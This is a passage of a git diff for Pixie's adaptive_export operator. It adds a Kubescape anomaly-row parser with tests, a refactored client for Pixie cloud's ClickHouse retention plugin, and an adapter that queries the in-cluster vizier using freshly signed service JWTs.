len(stub.bodies()) == 0 { + time.Sleep(5 * time.Millisecond) + } + bodies := stub.bodies() + if len(bodies) == 0 { + t.Fatalf("no INSERTs reached stub-CH within 2s") + } + + wantHash := string(anomaly.Hash(anomaly.Target{ + PID: 106040, Comm: "redis-server", + Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis", + })) + matched := false + for _, b := range bodies { + if strings.Contains(string(b), `"anomaly_hash":"`+wantHash+`"`) && + strings.Contains(string(b), `"hostname":"node-1"`) && + strings.Contains(string(b), `"namespace":"redis"`) && + strings.Contains(string(b), `"pid":106040`) { + matched = true + break + } + } + if !matched { + t.Fatalf("no INSERT body had the expected attribution shape; bodies=\n%s", joinBodies(bodies)) + } +} + +func joinBodies(bs [][]byte) string { + out := make([]string, len(bs)) + for i, b := range bs { + out[i] = string(b) + } + return strings.Join(out, "\n---\n") +} diff --git a/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel b/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel new file mode 100644 index 00000000000..47b9b0b3481 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel @@ -0,0 +1,37 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "kubescape", + srcs = ["extract.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) + +pl_go_test( + name = "kubescape_test", + srcs = ["extract_test.go"], + embed = [":kubescape"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/kubescape/extract.go b/src/vizier/services/adaptive_export/internal/kubescape/extract.go new file mode 100644 index 00000000000..be51d5159c0 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/kubescape/extract.go @@ -0,0 +1,117 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package kubescape parses the Kubescape-shaped fields of a +// forensic_db.kubescape_logs row into the source-agnostic types used +// downstream: +// - anomaly.Target — workload identity (used to compute the hash) +// - Event — Target plus event-specific fields (event_time, +// rule id, hostname) needed for window math + persistence +// +// This package is the only place in the operator that knows the JSON +// shape of RuntimeK8sDetails / RuntimeProcessDetails. Once an Event +// has been extracted, no further code needs to care that the source +// was Kubescape. +package kubescape + +import ( + "encoding/json" + "errors" + "fmt" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// ErrIncompleteEvent is returned by Extract when one of the required +// fields (event_time, rule id, comm, pid) is missing or unparseable. +// Pod and Namespace are NOT required — host-pid processes legitimately +// run with empty pod / namespace. +var ErrIncompleteEvent = errors.New("kubescape: incomplete event") + +// Row is the operator-facing shape of one forensic_db.kubescape_logs row. +// JSON-encoded fields stay as strings — the operator parses them itself +// to keep the ClickHouse driver layer simple. +type Row struct { + EventTime uint64 // schema: event_time UInt64 (unix nanos) + RuleID string + Hostname string + K8sDetails string // schema: RuntimeK8sDetails String (JSON) + ProcessDetails string // schema: RuntimeProcessDetails String (JSON) +} + +// Event is one parsed kubescape anomaly: workload identity + the bits +// we need for time-window math and ClickHouse persistence. +type Event struct { + Target anomaly.Target + EventTime uint64 // unix nanoseconds — propagated end-to-end + RuleID string // diagnostic only + Hostname string // node-local key +} + +// k8sDetails captures only pod / namespace; ignore the rest so JSON +// evolution upstream doesn't break us. +type k8sDetails struct { + PodName string `json:"podName"` + PodNamespace string `json:"podNamespace"` +} + +type processDetails struct { + ProcessTree struct { + PID uint64 `json:"pid"` + Comm string `json:"comm"` + } `json:"processTree"` +} + +// Extract parses a Row into an Event. Required fields are EventTime, +// RuleID, processTree.pid, processTree.comm. Pod and Namespace MAY be +// empty (host-pid processes outside any pod). Pure: no I/O, no clock. +func Extract(r Row) (Event, error) { + if r.RuleID == "" { + return Event{}, fmt.Errorf("%w: RuleID empty", ErrIncompleteEvent) + } + if r.EventTime == 0 { + return Event{}, fmt.Errorf("%w: EventTime zero", ErrIncompleteEvent) + } + // K8sDetails is OPTIONAL at parse time — host-pid events legitimately + // have no pod/namespace. We only error on malformed JSON. + var k8s k8sDetails + if r.K8sDetails != "" { + if err := json.Unmarshal([]byte(r.K8sDetails), &k8s); err != nil { + return Event{}, fmt.Errorf("%w: parse RuntimeK8sDetails: %v", ErrIncompleteEvent, err) + } + } + var proc processDetails + if err := json.Unmarshal([]byte(r.ProcessDetails), &proc); err != nil { + return Event{}, fmt.Errorf("%w: parse RuntimeProcessDetails: %v", ErrIncompleteEvent, err) + } + if proc.ProcessTree.Comm == "" { + return Event{}, fmt.Errorf("%w: processTree.comm empty", ErrIncompleteEvent) + } + if proc.ProcessTree.PID == 0 { + return Event{}, fmt.Errorf("%w: processTree.pid zero", ErrIncompleteEvent) + } + return Event{ + Target: anomaly.Target{ + PID: proc.ProcessTree.PID, + Comm: proc.ProcessTree.Comm, + Pod: k8s.PodName, + Namespace: k8s.PodNamespace, + }, + EventTime: r.EventTime, + RuleID: r.RuleID, + Hostname: r.Hostname, + }, nil +} diff --git a/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go b/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go new file mode 100644 index 00000000000..90f10500d29 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go @@ -0,0 +1,141 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package kubescape + +import ( + "errors" + "testing" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +const canonicalK8sDetails = `{"clusterName":"bobexample","containerName":"redis","namespace":"redis","podName":"redis-578d5dc9bd-kjj78","podNamespace":"redis","workloadName":"redis","workloadKind":"Deployment"}` + +const canonicalProcessDetails = `{"processTree":{"pid":106040,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":105965,"uid":999}}` + +func canonicalRow() Row { + return Row{ + EventTime: 1744477360303026359, + RuleID: "R1005", + Hostname: "node-1", + K8sDetails: canonicalK8sDetails, + ProcessDetails: canonicalProcessDetails, + } +} + +// TestExtract_FromCanonicalRow — pulls all four target fields plus +// EventTime + RuleID + Hostname from a real-shape kubescape row. +func TestExtract_FromCanonicalRow(t *testing.T) { + ev, err := Extract(canonicalRow()) + if err != nil { + t.Fatalf("Extract: %v", err) + } + if ev.Target.PID != 106040 { + t.Fatalf("PID = %d", ev.Target.PID) + } + if ev.Target.Comm != "redis-server" { + t.Fatalf("Comm = %q", ev.Target.Comm) + } + if ev.Target.Pod != "redis-578d5dc9bd-kjj78" { + t.Fatalf("Pod = %q", ev.Target.Pod) + } + if ev.Target.Namespace != "redis" { + t.Fatalf("Namespace = %q", ev.Target.Namespace) + } + if ev.EventTime != 1744477360303026359 { + t.Fatalf("EventTime = %d", ev.EventTime) + } + if ev.RuleID != "R1005" || ev.Hostname != "node-1" { + t.Fatalf("RuleID/Hostname wrong: %+v", ev) + } +} + +// TestExtract_AllowsEmptyPodNamespace — host-pid processes (no pod) +// must still produce a valid Event. +func TestExtract_AllowsEmptyPodNamespace(t *testing.T) { + row := canonicalRow() + row.K8sDetails = "" // host-pid: no k8s context + ev, err := Extract(row) + if err != nil { + t.Fatalf("Extract empty-k8s row: %v", err) + } + if ev.Target.Pod != "" || ev.Target.Namespace != "" { + t.Fatalf("expected empty Pod/Namespace, got %+v", ev.Target) + } + if ev.Target.PID != 106040 || ev.Target.Comm != "redis-server" { + t.Fatalf("PID/Comm lost: %+v", ev.Target) + } + // And the hash should still compute deterministically. + if h := anomaly.Hash(ev.Target); len(h) != 32 { + t.Fatalf("hash on empty-k8s target invalid: %q", h) + } +} + +// TestExtract_StableUnderJSONReorder — re-ordering JSON keys yields +// identical Target / Event. +func TestExtract_StableUnderJSONReorder(t *testing.T) { + r := canonicalRow() + r.K8sDetails = `{"workloadKind":"Deployment","podNamespace":"redis","podName":"redis-578d5dc9bd-kjj78","clusterName":"bobexample"}` + r.ProcessDetails = `{"processTree":{"comm":"redis-server","ppid":1,"pid":106040,"cmdline":"redis-server","uid":0}}` + a, errA := Extract(canonicalRow()) + b, errB := Extract(r) + if errA != nil || errB != nil { + t.Fatalf("Extract errors: a=%v b=%v", errA, errB) + } + if a.Target != b.Target { + t.Fatalf("Target differs under JSON reorder: %+v vs %+v", a.Target, b.Target) + } + if anomaly.Hash(a.Target) != anomaly.Hash(b.Target) { + t.Fatalf("Hash differs under JSON reorder") + } +} + +// TestExtract_RequiresProcessTreeComm — empty / missing comm errors. +func TestExtract_RequiresProcessTreeComm(t *testing.T) { + for _, p := range []string{"", `{"processTree":}`, `{}`, `{"processTree":{"pid":1}}`, `{"processTree":{"comm":"","pid":1}}`} { + row := canonicalRow() + row.ProcessDetails = p + _, err := Extract(row) + if !errors.Is(err, ErrIncompleteEvent) { + t.Fatalf("proc=%q → %v, want ErrIncompleteEvent", p, err) + } + } +} + +// TestExtract_RequiresProcessTreePID — pid is required for hash uniqueness. +func TestExtract_RequiresProcessTreePID(t *testing.T) { + row := canonicalRow() + row.ProcessDetails = `{"processTree":{"comm":"redis-server","pid":0}}` + _, err := Extract(row) + if !errors.Is(err, ErrIncompleteEvent) { + t.Fatalf("got %v, want ErrIncompleteEvent for pid=0", err) + } +} + +// TestExtract_RequiresEventTimeAndRuleID — both required. +func TestExtract_RequiresEventTimeAndRuleID(t *testing.T) { + r := canonicalRow() + r.EventTime = 0 + if _, err := Extract(r); !errors.Is(err, ErrIncompleteEvent) { + t.Fatalf("EventTime=0 not rejected: %v", err) + } + r = canonicalRow() + r.RuleID = "" + if _, err := Extract(r); !errors.Is(err, ErrIncompleteEvent) { + t.Fatalf("RuleID='' not rejected: %v", err) + } +} diff --git a/src/vizier/services/adaptive_export/internal/pixie/pixie.go b/src/vizier/services/adaptive_export/internal/pixie/pixie.go index 97e5bb8ae23..67eeef3cd20 100644 --- a/src/vizier/services/adaptive_export/internal/pixie/pixie.go +++ b/src/vizier/services/adaptive_export/internal/pixie/pixie.go @@ -14,30 +14,37 @@ // // SPDX-License-Identifier: Apache-2.0 +// Package pixie is a thin gRPC wrapper around Pixie cloud's +// PluginService — used by adaptive_export at boot only, to ensure the +// ClickHouse retention plugin is enabled. Retention scripts themselves +// (the PxL that Pixie runs to populate forensic_db.) are +// user-defined via the Pixie UI; this package does NOT manage them. package pixie import ( "context" "crypto/tls" "fmt" + "net" "strings" "github.com/gogo/protobuf/types" "google.golang.org/grpc" "google.golang.org/grpc/credentials" "google.golang.org/grpc/metadata" + "px.dev/pixie/src/api/go/pxapi/utils" "px.dev/pixie/src/api/proto/cloudpb" "px.dev/pixie/src/api/proto/uuidpb" - "px.dev/pixie/src/vizier/services/adaptive_export/internal/script" ) const ( - clickhousePluginId = "clickhouse" - exportUrlConfig = "exportURL" + clickhousePluginID = "clickhouse" + exportURLConfig = "exportURL" ) +// Client wraps a gRPC connection to Pixie cloud's PluginService. type Client struct { cloudAddr string ctx context.Context @@ -46,99 +53,98 @@ type Client struct { pluginClient cloudpb.PluginServiceClient } +// NewClient dials the Pixie cloud and authenticates with apiKey via +// the per-call metadata header. func NewClient(ctx context.Context, apiKey string, cloudAddr string) (*Client, error) { if apiKey == "" { - fmt.Println("WARNING: API key is empty!") + return nil, fmt.Errorf("pixie: empty API key") } - c := &Client{ cloudAddr: cloudAddr, ctx: metadata.AppendToOutgoingContext(ctx, "pixie-api-key", apiKey), } - if err := c.init(); err != nil { return nil, err } - return c, nil } func (c *Client) init() error { - isInternal := strings.ContainsAny(c.cloudAddr, "cluster.local") - - tlsConfig := &tls.Config{InsecureSkipVerify: isInternal} + host := c.cloudAddr + if h, _, err := net.SplitHostPort(c.cloudAddr); err == nil { + host = h + } + isInternal := host == "cluster.local" || strings.HasSuffix(host, ".cluster.local") + tlsConfig := &tls.Config{ + InsecureSkipVerify: isInternal, //nolint:gosec // in-cluster vizier traffic only + MinVersion: tls.VersionTLS12, + } creds := credentials.NewTLS(tlsConfig) - conn, err := grpc.Dial(c.cloudAddr, grpc.WithTransportCredentials(creds)) if err != nil { return err } - c.grpcConn = conn c.pluginClient = cloudpb.NewPluginServiceClient(conn) return nil } +// ClickHousePluginConfig is the minimal config the ensure-on path needs. +type ClickHousePluginConfig struct { + ExportURL string +} + +// GetClickHousePlugin returns the ClickHouse retention plugin descriptor, +// or an error if it is not registered with the cloud. func (c *Client) GetClickHousePlugin() (*cloudpb.Plugin, error) { - req := &cloudpb.GetPluginsRequest{ - Kind: cloudpb.PK_RETENTION, - } + req := &cloudpb.GetPluginsRequest{Kind: cloudpb.PK_RETENTION} resp, err := c.pluginClient.GetPlugins(c.ctx, req) if err != nil { return nil, err } for _, plugin := range resp.Plugins { - if plugin.Id == clickhousePluginId { + if plugin.Id == clickhousePluginID { return plugin, nil } } - return nil, fmt.Errorf("the %s plugin could not be found", clickhousePluginId) -} - -type ClickHousePluginConfig struct { - ExportUrl string + return nil, fmt.Errorf("pixie: %s plugin not found", clickhousePluginID) } +// GetClickHousePluginConfig returns the current org-level config (the +// ExportURL the retention plugin is currently writing to), falling back +// to the plugin's default if no custom URL is set. func (c *Client) GetClickHousePluginConfig() (*ClickHousePluginConfig, error) { - req := &cloudpb.GetOrgRetentionPluginConfigRequest{ - PluginId: clickhousePluginId, - } + req := &cloudpb.GetOrgRetentionPluginConfigRequest{PluginId: clickhousePluginID} resp, err := c.pluginClient.GetOrgRetentionPluginConfig(c.ctx, req) if err != nil { return nil, err } - exportUrl := resp.CustomExportUrl - if exportUrl == "" { - exportUrl, err = c.getDefaultClickHouseExportUrl() + exportURL := resp.CustomExportUrl + if exportURL == "" { + info, err := c.pluginClient.GetRetentionPluginInfo(c.ctx, + &cloudpb.GetRetentionPluginInfoRequest{PluginId: clickhousePluginID}) if err != nil { return nil, err } + exportURL = info.DefaultExportURL } - return &ClickHousePluginConfig{ - ExportUrl: exportUrl, - }, nil -} - -func (c *Client) getDefaultClickHouseExportUrl() (string, error) { - req := &cloudpb.GetRetentionPluginInfoRequest{ - PluginId: clickhousePluginId, - } - info, err := c.pluginClient.GetRetentionPluginInfo(c.ctx, req) - if err != nil { - return "", err - } - return info.DefaultExportURL, nil + return &ClickHousePluginConfig{ExportURL: exportURL}, nil } +// EnableClickHousePlugin turns the plugin on with the supplied +// ExportURL. Idempotent on the cloud side: calling Enable when already +// enabled re-applies the same config without effect. DisablePresets is +// true so existing user-defined retention scripts (the source of truth +// for what gets written) are not overwritten by Pixie's preset set. func (c *Client) EnableClickHousePlugin(config *ClickHousePluginConfig, version string) error { req := &cloudpb.UpdateRetentionPluginConfigRequest{ - PluginId: clickhousePluginId, + PluginId: clickhousePluginID, Configs: map[string]string{ - exportUrlConfig: config.ExportUrl, + exportURLConfig: config.ExportURL, }, Enabled: &types.BoolValue{Value: true}, Version: &types.StringValue{Value: version}, - CustomExportUrl: &types.StringValue{Value: config.ExportUrl}, + CustomExportUrl: &types.StringValue{Value: config.ExportURL}, InsecureTLS: &types.BoolValue{Value: false}, DisablePresets: &types.BoolValue{Value: true}, } @@ -146,6 +152,11 @@ func (c *Client) EnableClickHousePlugin(config *ClickHousePluginConfig, version return err } +// GetPresetScripts returns the ClickHouse-plugin preset retention scripts. +// These are the canonical http_events / dns_events / … bulk-write PxL +// scripts the plugin ships with. INSTALL_PRESET_SCRIPTS=true on the +// adaptive_export operator boot path uses this to bootstrap a cluster +// that has no user-defined retention scripts yet (DEMO PATH). func (c *Client) GetPresetScripts() ([]*script.ScriptDefinition, error) { resp, err := c.pluginClient.GetRetentionScripts(c.ctx, &cloudpb.GetRetentionScriptsRequest{}) if err != nil { @@ -153,7 +164,7 @@ func (c *Client) GetPresetScripts() ([]*script.ScriptDefinition, error) { } var l []*script.ScriptDefinition for _, s := range resp.Scripts { - if s.PluginId == clickhousePluginId && s.IsPreset { + if s.PluginId == clickhousePluginID && s.IsPreset { sd, err := c.getScriptDefinition(s) if err != nil { return nil, err @@ -164,39 +175,38 @@ func (c *Client) GetPresetScripts() ([]*script.ScriptDefinition, error) { return l, nil } -func (c *Client) GetClusterScripts(clusterId, clusterName string) ([]*script.Script, error) { +// GetClusterScripts returns the retention scripts CURRENTLY installed on +// clusterID. Caller diffs against GetPresetScripts to figure out what +// to add / update / delete. +func (c *Client) GetClusterScripts(clusterID, clusterName string) ([]*script.Script, error) { resp, err := c.pluginClient.GetRetentionScripts(c.ctx, &cloudpb.GetRetentionScriptsRequest{}) if err != nil { return nil, err } var l []*script.Script for _, s := range resp.Scripts { - if s.PluginId == clickhousePluginId { + if s.PluginId == clickhousePluginID { sd, err := c.getScriptDefinition(s) if err != nil { return nil, err } + cIDs := "" + for i, id := range s.ClusterIDs { + if i > 0 { + cIDs += "," + } + cIDs += utils.ProtoToUUIDStr(id) + } l = append(l, &script.Script{ ScriptDefinition: *sd, ScriptId: utils.ProtoToUUIDStr(s.ScriptID), - ClusterIds: getClusterIdsAsString(s.ClusterIDs), + ClusterIds: cIDs, }) } } return l, nil } -func getClusterIdsAsString(clusterIDs []*uuidpb.UUID) string { - scriptClusterId := "" - for i, id := range clusterIDs { - if i > 0 { - scriptClusterId = scriptClusterId + "," - } - scriptClusterId = scriptClusterId + utils.ProtoToUUIDStr(id) - } - return scriptClusterId -} - func (c *Client) getScriptDefinition(s *cloudpb.RetentionScript) (*script.ScriptDefinition, error) { resp, err := c.pluginClient.GetRetentionScript(c.ctx, &cloudpb.GetRetentionScriptRequest{ID: s.ScriptID}) if err != nil { @@ -211,37 +221,58 @@ func (c *Client) getScriptDefinition(s *cloudpb.RetentionScript) (*script.Script }, nil } -func (c *Client) AddDataRetentionScript(clusterId string, scriptName string, description string, frequencyS int64, contents string) error { +// DeleteDataRetentionScript removes the script with the given UUID. +// Used by INSTALL_PRESET_SCRIPTS to purge stale scripts that target +// tables no longer in the schema. +func (c *Client) DeleteDataRetentionScript(scriptID string) error { + req := &cloudpb.DeleteRetentionScriptRequest{ + ID: utils.ProtoFromUUIDStrOrNil(scriptID), + } + _, err := c.pluginClient.DeleteRetentionScript(c.ctx, req) + return err +} + +// AddDataRetentionScript creates a new retention script on clusterID, +// running every frequencyS seconds with the given PxL contents. +func (c *Client) AddDataRetentionScript(clusterID string, scriptName string, description string, frequencyS int64, contents string) error { req := &cloudpb.CreateRetentionScriptRequest{ ScriptName: scriptName, Description: description, FrequencyS: frequencyS, Contents: contents, - ClusterIDs: []*uuidpb.UUID{utils.ProtoFromUUIDStrOrNil(clusterId)}, - PluginId: clickhousePluginId, + ClusterIDs: []*uuidpb.UUID{utils.ProtoFromUUIDStrOrNil(clusterID)}, + PluginId: clickhousePluginID, } _, err := c.pluginClient.CreateRetentionScript(c.ctx, req) return err } -func (c *Client) UpdateDataRetentionScript(clusterId string, scriptId string, scriptName string, description string, frequencyS int64, contents string) error { - req := &cloudpb.UpdateRetentionScriptRequest{ - ID: utils.ProtoFromUUIDStrOrNil(scriptId), - ScriptName: &types.StringValue{Value: scriptName}, - Description: &types.StringValue{Value: description}, - Enabled: &types.BoolValue{Value: true}, - FrequencyS: &types.Int64Value{Value: frequencyS}, - Contents: &types.StringValue{Value: contents}, - ClusterIDs: []*uuidpb.UUID{utils.ProtoFromUUIDStrOrNil(clusterId)}, - } - _, err := c.pluginClient.UpdateRetentionScript(c.ctx, req) - return err -} - -func (c *Client) DeleteDataRetentionScript(scriptId string) error { - req := &cloudpb.DeleteRetentionScriptRequest{ - ID: utils.ProtoFromUUIDStrOrNil(scriptId), +// EnsureClickHousePluginEnabled is the boot-time idempotent op the +// operator calls in main.go. If the plugin is already enabled with a +// non-empty ExportURL, no-op. Otherwise, enable it with the supplied +// fallback URL. Returns the resolved ExportURL for diagnostics. +func (c *Client) EnsureClickHousePluginEnabled(fallbackExportURL string) (string, error) { + plugin, err := c.GetClickHousePlugin() + if err != nil { + return "", err } - _, err := c.pluginClient.DeleteRetentionScript(c.ctx, req) - return err + if plugin.RetentionEnabled { + cfg, err := c.GetClickHousePluginConfig() + if err != nil { + return "", err + } + if cfg.ExportURL != "" { + return cfg.ExportURL, nil + } + } + if fallbackExportURL == "" { + return "", fmt.Errorf("pixie: plugin not enabled and no fallback ExportURL provided") + } + if err := c.EnableClickHousePlugin( + &ClickHousePluginConfig{ExportURL: fallbackExportURL}, + plugin.LatestVersion, + ); err != nil { + return "", err + } + return fallbackExportURL, nil } diff --git a/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel b/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel new file mode 100644 index 00000000000..5965e699cf2 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel @@ -0,0 +1,30 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") + +go_library( + name = "pixieapi", + srcs = ["pixieapi.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixieapi", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/api/go/pxapi", + "//src/api/go/pxapi/errdefs", + "//src/api/go/pxapi/types", + "//src/shared/services/utils", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go new file mode 100644 index 00000000000..651fb5c7fd1 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go @@ -0,0 +1,218 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package pixieapi adapts pxapi to a flat-row Pixie interface for the +// controller. Use when the operator (not the cloud's retention plugin) +// is the writer of pixie observation rows — necessary on deployments +// where the cloud can't reach an internal ClickHouse endpoint. +package pixieapi + +import ( + "context" + "errors" + "fmt" + "os" + "sync" + + "px.dev/pixie/src/api/go/pxapi" + "px.dev/pixie/src/api/go/pxapi/errdefs" + "px.dev/pixie/src/api/go/pxapi/types" + jwtutils "px.dev/pixie/src/shared/services/utils" +) + +// Row is a flat per-pixie-row map[col]any. Compatible with sink's +// per-row JSONEachRow encoder. +type Row map[string]any + +// Adapter executes PxL via pxapi and returns flat rows. +type Adapter struct { + client *pxapi.Client + clusterID string + // directOpts, when non-nil, makes Query rebuild a pxapi.Client per + // call with a freshly-minted service JWT in WithBearerAuth. Used + // for direct-mode (in-cluster vizier-query-broker), where the cloud + // passthrough proxy is bypassed entirely. JWTs are minted fresh + // because GenerateJWTForService produces 10-minute claims and we + // want each fan-out window to carry its own valid token. + directOpts *DirectOptions +} + +// DirectOptions configures direct-mode connection to vizier in-cluster. +// Use when the cloud's passthrough proxy can't authorize the operator's +// API key (e.g. self-hosted clouds where API keys are scoped per-cluster +// and a freshly-deployed cluster isn't yet linked to the key's owner). +type DirectOptions struct { + // VizierAddr is the in-cluster gRPC endpoint, typically + // "vizier-query-broker-svc.pl.svc.cluster.local:50300". + VizierAddr string + // SigningKey is the cluster's JWT signing key, mounted from + // pl-cluster-secrets/jwt-signing-key. + SigningKey string + // ServiceID is the issuer-side service identifier (claim "sub"). + // Defaults to "adaptive_export" if empty. + ServiceID string +} + +// New constructs an Adapter wired to the cluster's vizier via cloud passthrough. +func New(client *pxapi.Client, clusterID string) *Adapter { + return &Adapter{client: client, clusterID: clusterID} +} + +// NewDirect constructs an Adapter that bypasses the pixie cloud and +// connects directly to the in-cluster vizier-query-broker. Each Query +// call rebuilds the gRPC client with a fresh service JWT. +func NewDirect(clusterID string, opts DirectOptions) *Adapter { + if opts.ServiceID == "" { + opts.ServiceID = "adaptive_export" + } + return &Adapter{clusterID: clusterID, directOpts: &opts} +} + +// NewDirectFromEnv builds a direct-mode Adapter from the runtime env. +// Reads ADAPTIVE_VIZIER_DIRECT_ADDR for the broker addr and +// PL_JWT_SIGNING_KEY for the signing key (matching kelvin/metadata +// pod env conventions). Returns an error if either is missing. +// +// The caller MUST also set PX_DISABLE_TLS=1 in the operator pod — +// pxapi's WithDisableTLSVerification only sets InsecureSkipVerify when +// that env is "1" AND the addr contains "cluster.local"; without it, +// pxapi log.Fatal's at NewClient time. We accept skip-verify because +// query-broker's TLS uses a self-signed in-cluster CA we don't have a +// clean way to mount here. +func NewDirectFromEnv(clusterID string) (*Adapter, error) { + addr := os.Getenv("ADAPTIVE_VIZIER_DIRECT_ADDR") + if addr == "" { + return nil, errors.New("pixieapi: ADAPTIVE_VIZIER_DIRECT_ADDR not set") + } + sk := os.Getenv("PL_JWT_SIGNING_KEY") + if sk == "" { + return nil, errors.New("pixieapi: PL_JWT_SIGNING_KEY not set (mount pl-cluster-secrets/jwt-signing-key)") + } + return NewDirect(clusterID, DirectOptions{VizierAddr: addr, SigningKey: sk}), nil +} + +// Query executes pxl on the configured cluster and aggregates every +// emitted record from every table into one []Row. +func (a *Adapter) Query(ctx context.Context, pxl string) ([]Row, error) { + client := a.client + if a.directOpts != nil { + // Direct mode: build fresh client + fresh service JWT for each + // query. JWT is 10-min; fan-out is seconds, so this is safe. + jwt, err := jwtutils.SignJWTClaims( + jwtutils.GenerateJWTForService(a.directOpts.ServiceID, "vizier"), + a.directOpts.SigningKey, + ) + if err != nil { + return nil, fmt.Errorf("pixieapi: sign JWT: %w", err) + } + // pxapi.Client doesn't expose a Close — its grpc.ClientConn is + // unexported. We accept GC-time reclamation: a Query in direct + // mode runs once per anomaly window per refresh interval (≥30s + // in production), so the per-query connection-leak rate is + // bounded and matched by goroutine + JWT expiry every ~10min. + // If we ever build a high-throughput direct-mode path, swap to + // a long-lived client + JWT-refresh ticker instead. + c, err := pxapi.NewClient(ctx, + pxapi.WithCloudAddr(a.directOpts.VizierAddr), + pxapi.WithDisableTLSVerification(a.directOpts.VizierAddr), + pxapi.WithBearerAuth(jwt), + ) + if err != nil { + return nil, fmt.Errorf("pixieapi: direct dial: %w", err) + } + client = c + } + vz, err := client.NewVizierClient(ctx, a.clusterID) + if err != nil { + return nil, fmt.Errorf("pixieapi: vizier dial: %w", err) + } + mux := newCollector() + rs, err := vz.ExecuteScript(ctx, pxl, mux) + if err != nil { + return nil, fmt.Errorf("pixieapi: ExecuteScript: %w", err) + } + defer rs.Close() + if err := rs.Stream(); err != nil { + if errdefs.IsCompilationError(err) { + return nil, fmt.Errorf("pixieapi: PxL compilation: %w", err) + } + return nil, fmt.Errorf("pixieapi: stream: %w", err) + } + return mux.rows(), nil +} + +type collector struct { + mu sync.Mutex + all []Row +} + +func newCollector() *collector { return &collector{} } + +func (c *collector) AcceptTable(_ context.Context, _ types.TableMetadata) (pxapi.TableRecordHandler, error) { + return &tableHandler{out: c}, nil +} + +func (c *collector) rows() []Row { + c.mu.Lock() + defer c.mu.Unlock() + return append([]Row(nil), c.all...) +} + +type tableHandler struct { + out *collector + meta types.TableMetadata +} + +func (h *tableHandler) HandleInit(_ context.Context, md types.TableMetadata) error { + h.meta = md + return nil +} + +func (h *tableHandler) HandleRecord(_ context.Context, rec *types.Record) error { + row := make(Row, len(h.meta.ColInfo)) + for _, col := range h.meta.ColInfo { + datum := rec.GetDatum(col.Name) + if datum == nil { + continue + } + row[col.Name] = datumValue(datum) + } + h.out.mu.Lock() + h.out.all = append(h.out.all, row) + h.out.mu.Unlock() + return nil +} + +func (h *tableHandler) HandleDone(_ context.Context) error { return nil } + +func datumValue(d types.Datum) any { + switch v := d.(type) { + case *types.BooleanValue: + return v.Value() + case *types.Int64Value: + return v.Value() + case *types.Float64Value: + return v.Value() + case *types.StringValue: + return v.Value() + case *types.Time64NSValue: + return v.Value() + case *types.UInt128Value: + return v.Value() + default: + return 